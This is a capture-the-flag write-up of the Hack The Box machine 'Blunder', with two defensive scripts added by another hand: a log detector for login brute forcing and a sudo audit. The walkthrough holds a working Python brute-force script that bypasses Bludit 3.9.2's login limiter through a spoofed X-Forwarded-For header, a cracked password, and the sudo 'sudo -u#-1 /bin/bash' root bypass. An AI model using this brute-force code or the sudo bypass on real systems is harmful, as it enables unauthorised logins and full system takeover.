
Blunder — Hack The Box [Write-up]

Blunder is a Linux machine rated easy on Hack The Box. It consists of finding credentials to log in to Bludit, using an RCE exploit to gain an initial shell, reading some database files in order to pivot to another user, and finally spawning a root shell using a sudo security bypass.

Used Tools:

  • nmap
  • Gobuster
  • Searchsploit
  • Metasploit
  • Cewl

1. SCANNING & ENUMERATION

I will start with nmap and the -A parameter, which enables OS detection, version detection, script scanning, and traceroute, and pipe the output to the tee command, which saves it in a file named “nmap” while also showing it on the screen.

Nmap finishes with port 21 closed and port 80 open.

The site is a blog website containing 3 posts and nothing more.

Let’s try directory bruteforcing. I’ll run gobuster with -u for the URL, -w for the wordlist, and -o for the output file.

gobuster dir -u http://10.10.10.191/ -w /usr/share/wordlists/dirb/common.txt -o directory.txt  2>/dev/null

The directory bruteforce finished and I found “/admin”, “/cgi-bin” and “/robots.txt”. /admin is an admin interface with a login and password form; I tried SQL injection but got nowhere. The cgi-bin directory was disabled, so I couldn’t proceed with attacks like Shellshock, and robots.txt contained nothing useful.

After a lot of searching I reran the directory bruteforce with a different wordlist:

gobuster dir -u http://10.10.10.191/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o directory2.txt  2>/dev/null

This time I found three extra entries: “/install.php”, “/todo.txt” and “/usb”.

2. EXPLOITATION:

Visiting /install.php discloses the CMS in use: Bludit.

Checking /todo.txt the following notes are discovered:

The notes say that the CMS hasn’t been updated yet, so we need to find out its current version, and they mention a user called fergus.

Revisiting /admin, the login page, and viewing the page source discloses the Bludit version as 3.9.2.

I searched searchsploit for bludit 3.9.2.

There is a Metasploit module, so let’s take a look at it:

It requires a username and a password to work…

We already have a username, fergus, from todo.txt, so we need a password. Let’s try bruteforcing it by building a password list from the common words on the website using cewl, with -d for the crawl depth, -m for the minimum word length and -w for the output file:

cewl -d 3 -m 5 -w HTB/Blunder/cewl_wordlist.txt http://10.10.10.191/

After creating our password list we need to try it… I found a Python script online for the Bludit brute force mitigation bypass: https://rastating.github.io/bludit-brute-force-mitigation-bypass/

After a lot of modification to make it run properly, the code was as follows:

#!/usr/bin/env python3
# Bludit 3.9.2 login brute force, adapted from
# https://rastating.github.io/bludit-brute-force-mitigation-bypass/
import re
import requests

host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist_path = r"/home/kali/HTB/Blunder/cewl_wordlist.txt"  # Put here the location of the password list

# Every whitespace-separated word of the cewl output becomes a candidate password
wordlist = []
with open(wordlist_path, 'r') as f:
    for line in f:
        wordlist.extend(line.split())

for password in wordlist:
    # Each attempt uses a fresh session and fetches a fresh CSRF token from the login page
    session = requests.Session()
    login_page = session.get(login_url)
    match = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text)
    if match is None:
        print('[!] Could not find the tokenCSRF field on the login page, stopping')
        break
    csrf_token = match.group(1)

    print('[*] Trying: {p}'.format(p = password))

    headers = {
        'X-Forwarded-For': password,  # Bludit's attempt limiter keys on this header, so it changes on every request
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    # Do not follow redirects: a successful login answers with a redirect to the dashboard
    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break

When executed, it tries the passwords one by one until it finds a valid one, “RolandDeschain”:

Let’s pass it to our Metasploit exploit and run it…

We successfully gained a meterpreter shell. Gaining a more interactive shell:
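The script above gets past Bludit’s login limiter because the limiter identifies a client by the X-Forwarded-For header, which the client chooses. As an added defensive example (my own code, not part of the original post or of Bludit), the detector below groups POST /admin/login attempts by the TCP peer address, which the client cannot forge, and flags any peer that sends a burst of attempts, also reporting how many distinct X-Forwarded-For values it used. The log lines are constructed for this example; the assumed log format is Apache combined format with the X-Forwarded-For request header appended as one more quoted field.

```python
#!/usr/bin/env python3
"""Flag login brute forcing that rotates the X-Forwarded-For header.

Added example for this write-up, not code from the original post or Bludit.
Assumed log format (Apache): combined format plus "%{X-Forwarded-For}i" as a
final quoted field. Attempts are keyed on %h, the real peer address.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: one client rotating the header on every attempt,
# and one client with two ordinary attempts (a mistyped password, then success).
SAMPLE_LOG = """\
10.10.14.5 - - [03/Jun/2020:10:00:01 +0000] "GET /admin/login HTTP/1.1" 200 2314 "-" "Mozilla/5.0" "-"
10.10.14.5 - - [03/Jun/2020:10:00:02 +0000] "POST /admin/login HTTP/1.1" 200 2314 "http://10.10.10.191/admin/login" "Mozilla/5.0" "blunder"
10.10.14.5 - - [03/Jun/2020:10:00:03 +0000] "POST /admin/login HTTP/1.1" 200 2314 "http://10.10.10.191/admin/login" "Mozilla/5.0" "stephen"
10.10.14.5 - - [03/Jun/2020:10:00:04 +0000] "POST /admin/login HTTP/1.1" 200 2314 "http://10.10.10.191/admin/login" "Mozilla/5.0" "ideas"
10.10.14.5 - - [03/Jun/2020:10:00:05 +0000] "POST /admin/login HTTP/1.1" 200 2314 "http://10.10.10.191/admin/login" "Mozilla/5.0" "roland"
10.10.14.5 - - [03/Jun/2020:10:00:06 +0000] "POST /admin/login HTTP/1.1" 200 2314 "http://10.10.10.191/admin/login" "Mozilla/5.0" "kingdom"
10.10.14.5 - - [03/Jun/2020:10:00:07 +0000] "POST /admin/login HTTP/1.1" 302 0 "http://10.10.10.191/admin/login" "Mozilla/5.0" "fergus"
10.10.14.9 - - [03/Jun/2020:10:02:10 +0000] "POST /admin/login HTTP/1.1" 200 2314 "http://10.10.10.191/admin/login" "Mozilla/5.0" "-"
10.10.14.9 - - [03/Jun/2020:10:02:40 +0000] "POST /admin/login HTTP/1.1" 302 0 "http://10.10.10.191/admin/login" "Mozilla/5.0" "-"
"""

LOG_RE = re.compile(
    r'^(?P<peer>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "[^"]*" "(?P<xff>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return the fields of one access-log line as a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def find_login_bursts(lines, path="/admin/login", window=timedelta(minutes=5), threshold=5):
    """Return {peer: {"attempts": n, "distinct_xff": k}} for each peer that sent at
    least `threshold` POSTs to `path` within any span of length `window`."""
    per_peer = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == path:
            per_peer[rec["peer"]].append(rec)

    alerts = {}
    for peer, recs in per_peer.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end in range(len(recs)):
            # Slide the window start forward until it fits inside `window`
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts[peer] = {
                    "attempts": len(recs),
                    "distinct_xff": len({r["xff"] for r in recs}),
                }
                break
    return alerts


if __name__ == "__main__":
    for peer, info in find_login_bursts(SAMPLE_LOG.splitlines()).items():
        print(f"{peer}: {info['attempts']} login POSTs, "
              f"{info['distinct_xff']} distinct X-Forwarded-For values")
```

A high distinct_xff count from a single peer is the signature worth alerting on: a real proxy pool forwards many clients, but each client keeps one address across its attempts, whereas here every attempt carries a new one. The same idea applies to the limiter itself: if the application must honour X-Forwarded-For, it should only do so for connections coming from a trusted reverse proxy.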

shell
python -c 'import pty;pty.spawn("/bin/bash")'

We are now the “www-data” user. Moving to /home we find 2 users, hugo and shaun. Visiting hugo’s home directory we find user.txt, but trying to read it gives permission denied.

After a lot of searching through the system I found 2 directories called “bludit-3.10.0a” and “bludit-3.9.2” in /var/www.

Looking through bludit-3.10.0a’s contents, I found a user.php file in /var/www/bludit-3.10.0a/bl-content/databases.

Reading it reveals Hugo’s password hash, so let’s try to look it up online at https://hashtoolkit.com/decrypt-hash/…

It found a successful match with the password “Password120”.

Let’s change user and get the user flag…

3. PRIVILEGE ESCALATION:

Let’s list the user’s privileges (which commands sudo allows them to run):

This has a public exploit, “sudo 1.8.27 - Security Bypass”: https://www.exploit-db.com/exploits/47502

So we could escalate our privileges using:

sudo -u#-1 /bin/bash
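The bypass above needs two things at once: a sudo release older than 1.8.28, which is the release that fixed the bug behind the “sudo 1.8.27 - Security Bypass” exploit, and a sudoers rule that grants ALL run-as users while excluding only root (the `(ALL, !root)` form that `-u#-1` slips past). As an added audit example (my own code, not the original post’s or the sudo project’s), the script below takes the first line of `sudo -V` output and the text of a sudoers file and reports whether both conditions hold. The sudoers text used here is constructed for the example and is not the machine’s real file; the 1.8.28 threshold is from the sudo release history as I know it.

```python
#!/usr/bin/env python3
"""Audit sudo for the run-as negation bypass (fixed in sudo 1.8.28).

Added example for this write-up, not code from the original post or from sudo.
Inputs are assumed to be the text of `sudo -V` and of a sudoers file; the
sample values below are constructed, not taken from the real machine.
"""
import re

FIXED_VERSION = (1, 8, 28)  # first release where `-u#-1` no longer maps to root

# Constructed samples (assumptions for this example)
SAMPLE_SUDO_V = "Sudo version 1.8.27\nSudoers policy plugin version 1.8.27\n"
SAMPLE_SUDOERS = """\
# constructed sudoers file for the audit example
Defaults env_reset
root ALL=(ALL:ALL) ALL
hugo ALL=(ALL, !root) /bin/bash
shaun ALL=(www-data) /usr/bin/less
"""

# user host=(runas[:groups]) command   (the subset of sudoers syntax audited here)
RULE_RE = re.compile(r"^\s*(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*(?P<cmd>.*)$")


def parse_sudo_version(sudo_v_output):
    """Extract (major, minor, patch) from the first 'Sudo version X.Y.Z' line."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", sudo_v_output)
    if m is None:
        raise ValueError("no 'Sudo version' line found")
    return tuple(int(x) for x in m.groups())


def version_is_affected(version):
    """True for releases before the fix."""
    return tuple(version) < FIXED_VERSION


def negated_root_rules(sudoers_text):
    """Return (user, runas, command) for rules whose run-as user list is ALL minus root."""
    hits = []
    for line in sudoers_text.splitlines():
        if line.lstrip().startswith("#"):
            continue  # comment (an #include directive carries no user spec either)
        m = RULE_RE.match(line)
        if m is None:
            continue
        runas_users = m.group("runas").split(":", 1)[0]  # drop run-as groups after ':'
        entries = [e.strip() for e in runas_users.split(",")]
        if "ALL" in entries and "!root" in entries:
            hits.append((m.group("user"), m.group("runas"), m.group("cmd").strip()))
    return hits


def audit(sudo_v_output, sudoers_text):
    """Combine both checks; 'vulnerable' is True only when both conditions hold."""
    version = parse_sudo_version(sudo_v_output)
    rules = negated_root_rules(sudoers_text)
    affected = version_is_affected(version)
    return {
        "version": version,
        "affected_version": affected,
        "exposed_rules": rules,
        "vulnerable": affected and bool(rules),
    }


if __name__ == "__main__":
    result = audit(SAMPLE_SUDO_V, SAMPLE_SUDOERS)
    print("sudo version:", ".".join(map(str, result["version"])),
          "(affected)" if result["affected_version"] else "(fixed)")
    for user, runas, cmd in result["exposed_rules"]:
        print(f"exposed rule: {user} may run {cmd!r} as ({runas})")
    print("vulnerable:", result["vulnerable"])
```

Either fix closes the hole: upgrading sudo, or rewriting the rule so it names the users it should allow instead of negating root, since sudo’s own manual warns that `!` in a run-as list is not a reliable way to exclude an account.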

BOOOOOOOOOOOOOOOOOOOOM!!!!! Now we are root :D

Thank you so much for reading and I hope you learned a lot as I did ❤

0x3ashry

This post is licensed under CC BY 4.0 by the author.